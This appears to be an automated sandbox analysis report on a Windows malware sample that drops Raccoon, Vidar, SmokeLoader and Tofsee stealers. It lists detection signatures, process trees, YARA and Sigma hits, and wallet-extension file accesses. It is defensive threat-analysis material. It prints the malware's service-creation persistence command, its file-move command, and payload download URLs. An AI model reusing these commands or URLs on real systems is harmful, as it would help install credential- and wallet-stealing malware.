Play interactive tour

Edit tour

Windows Analysis Report GzsKHwvBmG.exe

Overview

General Information

Sample Name:	GzsKHwvBmG.exe
Analysis ID:	470442
MD5:	25390347b76af239fd1016a2b090ca89
SHA1:	3dfac63f469ea0be1d235fc5d7a1f33b53d56b54
SHA256:	c55df5e9d0ea176321a29f8957c7a43188796ae0fc0ffe1ae94ad6092d30ba77
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Raccoon SmokeLoader Tofsee Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Yara detected Vidar stealer

Yara detected Tofsee

Sigma detected: Copying Sensitive Files with Credential Data

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Deletes itself after installation

Tries to detect virtualization through RDTSC time measurements

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Contains functionality to steal Internet Explorer form passwords

Changes security center settings (notifications, updates, antivirus, firewall)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Connects to many different domains

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

GzsKHwvBmG.exe (PID: 5600 cmdline: 'C:\Users\user\Desktop\GzsKHwvBmG.exe' MD5: 25390347B76AF239FD1016A2B090CA89)

GzsKHwvBmG.exe (PID: 4440 cmdline: 'C:\Users\user\Desktop\GzsKHwvBmG.exe' MD5: 25390347B76AF239FD1016A2B090CA89)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

1EB.exe (PID: 5440 cmdline: C:\Users\user\AppData\Local\Temp\1EB.exe MD5: A69E12607D01237460808FA1709E5E86)

49B.exe (PID: 3092 cmdline: C:\Users\user\AppData\Local\Temp\49B.exe MD5: C633B1E68DCFFDAE991C3F2D2D4FFFA5)

WerFault.exe (PID: 4252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 752 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

B72.exe (PID: 5864 cmdline: C:\Users\user\AppData\Local\Temp\B72.exe MD5: 68D5331A8418C4089BB7C0F524C77728)

E61.exe (PID: 2964 cmdline: C:\Users\user\AppData\Local\Temp\E61.exe MD5: BF40705CBA9708182B61956985895005)

1AB6.exe (PID: 1928 cmdline: C:\Users\user\AppData\Local\Temp\1AB6.exe MD5: 9AA6DD10E0BFB49BAA17F04F44B9DCD3)

conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

2612.exe (PID: 5444 cmdline: C:\Users\user\AppData\Local\Temp\2612.exe MD5: 59C5BECF1794C98CBE8DA8E501F55DA5)

conhost.exe (PID: 480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

40A0.exe (PID: 5416 cmdline: C:\Users\user\AppData\Local\Temp\40A0.exe MD5: DF744C31B1D8DE9790059D2BAC52E2EF)

cmd.exe (PID: 1628 cmdline: 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\nkrwinfc\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4956 cmdline: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\bwlvafxv.exe' C:\Windows\SysWOW64\nkrwinfc\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 4684 cmdline: 'C:\Windows\System32\sc.exe' create nkrwinfc binPath= 'C:\Windows\SysWOW64\nkrwinfc\bwlvafxv.exe /d\'C:\Users\user\AppData\Local\Temp\40A0.exe\'' type= own start= auto DisplayName= 'wifi support' MD5: 24A3E2603E63BCB9695A2935D3B24695)

explorer.exe (PID: 5396 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 3980 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 800 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 2592 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 4952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4752 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5704 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5644 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5604 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 1280 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 1236 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4320 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 4660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6048 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

hhiwwui (PID: 1008 cmdline: C:\Users\user\AppData\Roaming\hhiwwui MD5: 25390347B76AF239FD1016A2B090CA89)

hhiwwui (PID: 3568 cmdline: C:\Users\user\AppData\Roaming\hhiwwui MD5: 25390347B76AF239FD1016A2B090CA89)

svchost.exe (PID: 3212 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 4552 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3092 -ip 3092 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 2872 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3092 -ip 3092 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5096 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3092 -ip 3092 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000016.00000000.410473881.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000019.00000002.458901650.00000000040A0000.00000040.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000016.00000000.409608494.0000000004920000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000016.00000003.382884263.00000000049D0000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000003.00000002.308302159.0000000000530000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000016.00000000.393584726.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000016.00000000.419422214.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000016.00000000.400296473.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000021.00000002.448334222.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000016.00000000.416098242.0000000004920000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000019.00000002.457312724.000000000267D000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.650305946.0000000004920000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000027.00000002.601848015.0000000002DA1000.00000040.00000001.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000016.00000000.424554766.0000000004920000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000021.00000003.415728419.0000000002E80000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000016.00000000.465918061.0000000004920000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000016.00000000.398407236.0000000004920000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000012.00000002.370106041.00000000004A0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.308352184.00000000006A1000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000019.00000003.389564548.0000000004170000.00000004.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000016.00000000.448938859.0000000004920000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000021.00000002.452136750.0000000002E40000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000016.00000000.459235582.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0000002D.00000002.559576605.0000000000371000.00000040.00000001.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000012.00000002.370292791.00000000005E1000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000016.00000000.436435697.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: 49B.exe PID: 3092	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: E61.exe PID: 2964	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.GzsKHwvBmG.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
3.1.GzsKHwvBmG.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
22.0.49B.exe.4920e50.12.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.20.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.16.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.2.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.2.49B.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.16.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.2.49B.exe.4920e50.2.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
25.2.E61.exe.40a0e50.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
25.3.E61.exe.4170000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
22.0.49B.exe.400000.15.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
25.2.E61.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
22.0.49B.exe.4920e50.8.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.400000.1.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.2.49B.exe.4920e50.2.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
18.2.hhiwwui.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
22.0.49B.exe.400000.3.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.8.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.4.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
18.1.hhiwwui.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
22.0.49B.exe.400000.7.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
25.2.E61.exe.40a0e50.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
22.0.49B.exe.400000.19.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.3.49B.exe.49d0000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.400000.11.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.20.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.3.49B.exe.49d0000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.2.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.12.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
22.0.49B.exe.4920e50.4.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
25.2.E61.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
25.3.E61.exe.4170000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 28 entries

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\bwlvafxv.exe' C:\Windows\SysWOW64\nkrwinfc\, CommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\bwlvafxv.exe' C:\Windows\SysWOW64\nkrwinfc\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\40A0.exe, ParentImage: C:\Users\user\AppData\Local\Temp\40A0.exe, ParentProcessId: 5416, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\bwlvafxv.exe' C:\Windows\SysWOW64\nkrwinfc\, ProcessId: 4956

Sigma detected: New Service Creation

Show sources

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\System32\sc.exe' create nkrwinfc binPath= 'C:\Windows\SysWOW64\nkrwinfc\bwlvafxv.exe /d\'C:\Users\user\AppData\Local\Temp\40A0.exe\'' type= own start= auto DisplayName= 'wifi support', CommandLine: 'C:\Windows\System32\sc.exe' create nkrwinfc binPath= 'C:\Windows\SysWOW64\nkrwinfc\bwlvafxv.exe /d\'C:\Users\user\AppData\Local\Temp\40A0.exe\'' type= own start= auto DisplayName= 'wifi support', CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\40A0.exe, ParentImage: C:\Users\user\AppData\Local\Temp\40A0.exe, ParentProcessId: 5416, ProcessCommandLine: 'C:\Windows\System32\sc.exe' create nkrwinfc binPath= 'C:\Windows\SysWOW64\nkrwinfc\bwlvafxv.exe /d\'C:\Users\user\AppData\Local\Temp\40A0.exe\'' type= own start= auto DisplayName= 'wifi support', ProcessId: 4684

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 22.0.49B.exe.4920e50.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.4920e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.4920e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.49B.exe.49d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.49B.exe.49d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.410473881.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.409608494.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.382884263.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.393584726.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.419422214.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.400296473.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.416098242.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.650305946.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.424554766.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.465918061.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.398407236.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.448938859.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.459235582.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.436435697.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 49B.exe PID: 3092, type: MEMORYSTR

Antivirus detection for URL or domain

Show sources

Source: http://readinglistforaugust3.xyz/	Avira URL Cloud: Label: malware
Source: http://readinglistforaugust3.xyz/reestr.exe	Avira URL Cloud: Label: malware
Source: http://readinglistforaugust3.xyz/raccon.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: GzsKHwvBmG.exe	Virustotal: Detection: 42%			Perma Link
Source: GzsKHwvBmG.exe	ReversingLabs: Detection: 45%

Machine Learning detection for sample

Show sources

Source: GzsKHwvBmG.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\E61.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\40A0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1AB6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2612.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hhiwwui	Joe Sandbox ML: detected

Source: 25.2.E61.exe.40a0e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 25.3.E61.exe.4170000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00420010 __EH_prolog,_strlen,CryptStringToBinaryA,	22_2_00420010
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0040C787 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,	22_2_0040C787
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0040E99E __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	22_2_0040E99E
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0040CEA6 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,	22_2_0040CEA6
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00429094 CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,	22_2_00429094
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0040EBCB CryptUnprotectData,LocalAlloc,_memmove,LocalFree,	25_2_0040EBCB
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0040E9D0 _memset,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,	25_2_0040E9D0
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0040EB68 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	25_2_0040EB68

Source: GzsKHwvBmG.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\49B.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 74.114.154.18:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49727 version: TLS 1.2

Source:	Binary string: C:\jenilol\fovogoranupiho_bakawol.pdb source: 49B.exe, 00000016.00000000.379502772.0000000000458000.00000002.00020000.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.290694665.000000000F820000.00000002.00000001.sdmp
Source:	Binary string: C:\docixeyola\pohisewabotay\temeboro jixixag\fodoxiwu.pdb source: GzsKHwvBmG.exe, 00000001.00000000.248132993.0000000000412000.00000002.00020000.sdmp, hhiwwui, 00000011.00000002.358441606.0000000000412000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\Alexx\Desktop\QWER\DeviceCredentialDeployment\bin\Release\Secured\ConfigurationStringConstants.pdb source: B72.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.290694665.000000000F820000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: 22_2_00434D4F __EH_prolog,GetLogicalDriveStringsA,

22_2_00434D4F

Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

